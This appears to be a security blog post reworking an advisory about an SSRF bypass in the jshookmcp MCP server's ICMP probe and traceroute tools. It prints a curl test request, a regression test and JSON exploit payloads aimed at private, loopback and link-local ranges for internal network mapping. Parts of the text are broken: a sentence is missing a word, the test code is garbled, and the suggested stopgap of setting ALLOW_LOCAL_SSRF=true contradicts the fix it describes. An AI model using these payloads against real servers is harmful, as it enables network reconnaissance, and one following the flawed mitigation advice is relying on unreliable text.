Listen to this Post
How the CVE Works
The jshookmcp network domain implements a centralized SSRF authorization policy designed to block access to private, loopback, link-local, and reserved IP addresses. This policy is enforced for raw HTTP, TCP, and TLS RTT tools through the `resolveAuthorizedTransportTarget` function, which checks the target against the policy and requires explicit authorization for private network access.
However, the `network_icmp_probe` and `network_traceroute` tools bypass this security control entirely. Instead of using the authorized resolver, these tools call resolveHostname()—a helper function that returns IPv4 literals directly and performs DNS A lookups without any validation against private, loopback, link-local, or reserved IP ranges.
An MCP client with access to an active network domain can therefore invoke `network_icmp_probe` or `network_traceroute` with an internal address such as 10.0.0.1. The server resolves the target and passes it directly to the native ICMP probe or traceroute sink, completely bypassing the SSRF authorization guard that would normally block the request.
The vulnerable call sequence is:
call_tool(name=network_icmp_probe, args={target: 10.0.0.1, ttl: 64})
-> ctx.router.has(network_icmp_probe) == true
-> ctx.executeToolWithTracking(network_icmp_probe, validatedArgs)
-> RawHandlers.handleNetworkIcmpProbe(validatedArgs)
-> resolveHostname(10.0.0.1) returns 10.0.0.1
-> icmpProbe({ target: 10.0.0.1, ttl: 64, ... })
`resolveAuthorizedTransportTarget` is not called on this path. The same missing policy pattern exists for network_traceroute.
This effectively turns the jshookmcp server into an internal network probing oracle, exposing reachability information, latency measurements, traceroute hops, and ICMP error classes from the server’s network position—all without requiring any authorization.
The vulnerability affects `@jshookmcp/jshook` version `0.3.1` and the main branch at commit d309c39. It was patched in version `0.3.2` with the of resolveAuthorizedHostTarget(), a policy-aware resolver that now blocks private IP ranges by default.
DailyCVE Form
Platform: ……. jshookmcp
Version: …….. 0.3.1
Vulnerability :…… SSRF Bypass (ICMP/Traceroute)
Severity: ……. Medium (CVSS 3.1: 4.3)
date: ………. 2026-05-02
Prediction: …… 2026-05-27 (patched in 0.3.2)
What Undercode Say: Analytics
SSRF Policy Bypass Detection
To verify whether a jshookmcp instance is vulnerable, test the ICMP probe against a private address:
Test ICMP probe against private IP (vulnerable if returns success)
curl -X POST http://localhost:3000/mcp \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"method": "call_tool",
"params": {
"name": "network_icmp_probe",
"arguments": {
"target": "10.0.0.1",
"ttl": 64
}
},
"id": 1
}'
Regression Test (from the security advisory)
The following test proves the bypass exists:
it('bypass proof: call_tool can drive network_icmp_probe to a private IP without the SSRF authorization guard', async () => {
const raw = new RawHandlers();
const ctx = {
router: {
has: vi.fn((name: string) => name === 'network_icmp_probe')
},
executeToolWithTracking: vi.fn((name: string, args: Record<string, unknown>) =>
raw.handleNetworkIcmpProbe(args)
),
} as any;
const response = await handleCallTool(ctx, {
name: 'network_icmp_probe',
args: { target: '10.0.0.1', ttl: 64 }
});
const body = JSON.parse(response.content[bash].text);
expect(body.success).toBe(true);
expect(state.resolveAuthorizedTransportTarget).not.toHaveBeenCalled();
expect(state.icmpProbe).toHaveBeenCalledWith(expect.objectContaining({
target: '10.0.0.1',
ttl: 64
}));
});
Run the test suite:
corepack pnpm exec vitest run --config vitest.config.ts \ tests/server/security/jshookmcp-network-meta-boundary.test.ts \ --reporter=verbose
Affected Code Locations:
| File | Lines | Function | Issue |
||-|-|-|
| `raw-latency-handlers.ts` | 123-139 | `network_traceroute` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 240-257 | `network_icmp_probe` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 408-416 | `resolveHostname()` | Returns IPv4 literals directly, no range validation |
| `ssrf-policy.ts` | 244-316 | Central policy | Blocks private targets unless authorized |
Exploit
An attacker with MCP client access to an active network domain can exploit this vulnerability by invoking the `network_icmp_probe` or `network_traceroute` tools with internal IP addresses.
Example exploit payloads:
{
"method": "call_tool",
"params": {
"name": "network_icmp_probe",
"arguments": {
"target": "10.0.0.1",
"ttl": 64
}
}
}
{
"method": "call_tool",
"params": {
"name": "network_traceroute",
"arguments": {
"target": "192.168.1.1"
}
}
}
Internal network reconnaissance targets:
– `10.0.0.0/8` – RFC 1918 private network
– `172.16.0.0/12` – RFC 1918 private network
– `192.168.0.0/16` – RFC 1918 private network
– `127.0.0.0/8` – Loopback
– `169.254.0.0/16` – Link-local
The server responds with ICMP echo results, latency measurements, TTL values, and traceroute hop information—effectively acting as an internal network mapping oracle from the server’s network position.
Impact scenarios:
- Remote transport exposure: When jshookmcp is exposed over Streamable HTTP or another remote transport
- Multi-tenant environments: Multiple clients sharing one server
- Windows or raw socket capability: Enhanced probe capabilities
This is not code execution and does not by itself exfiltrate response bodies—it is a reconnaissance primitive.
Protection
1. Upgrade to patched version
The vulnerability is fixed in `@jshookmcp/jshook` version `0.3.2`:
npm install @jshookmcp/[email protected]
2. Verify the fix
The patch introduces `resolveAuthorizedHostTarget()` in raw-helpers—a host-only SSRF guard that replaces `resolveHostname()` in both vulnerable handlers. The fix also adds 10 regression tests covering private IP blocks, DNS-to-private resolution, and loopback addresses.
3. Apply environment mitigation
If upgrading is not immediately possible, set the environment variable to explicitly allow local SSRF (note: this weakens security):
ALLOW_LOCAL_SSRF=true
4. Network-level protection
- Restrict access to the jshookmcp server to trusted clients only
- Use firewall rules to limit outbound ICMP and traceroute from the server
- Monitor for unusual `network_icmp_probe` or `network_traceroute` calls in logs
5. Remediation checklist (from the security advisory):
- [ ] Apply the same authorization model used by `network_rtt_measure` and `network_latency_stats` to `network_icmp_probe` and `network_traceroute`
– [ ] Accept an optional `authorization` object in both handlers - [ ] Resolve targets through the central policy helper or an equivalent host-only policy helper
- [ ] Block private and reserved ranges by default
- [ ] Pass only the policy-approved resolved address to the native probe
- [ ] Add regression tests for default-denied private targets, authorized private CIDR access, private hostnames, and `call_tool` dispatch
Impact
| Aspect | Details |
|–||
| Attack Vector | Network (MCP client → jshookmcp server) |
| Attack Complexity | Low |
| Privileges Required | Access to active network domain |
| User Interaction | None |
| Confidentiality Impact | Low (internal network topology disclosure) |
| Integrity Impact | None |
| Availability Impact | None |
| Scope | Unchanged |
| CVSS Base Score | 4.3 (Medium) |
Practical impact is strongest when:
- jshookmcp is exposed over Streamable HTTP or another remote transport
- Multiple clients share one server
- The server runs on Windows or with raw socket capability
What an attacker can learn:
- Whether internal hosts are reachable from the server
- Approximate latency to internal hosts
- Traceroute hop counts and paths
- ICMP error classes (host unreachable, port unreachable, TTL exceeded, etc.)
- Internal network topology and routing information
What an attacker cannot do:
- Execute arbitrary code
- Exfiltrate HTTP response bodies
- Modify internal systems
- Escalate privileges within the application
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

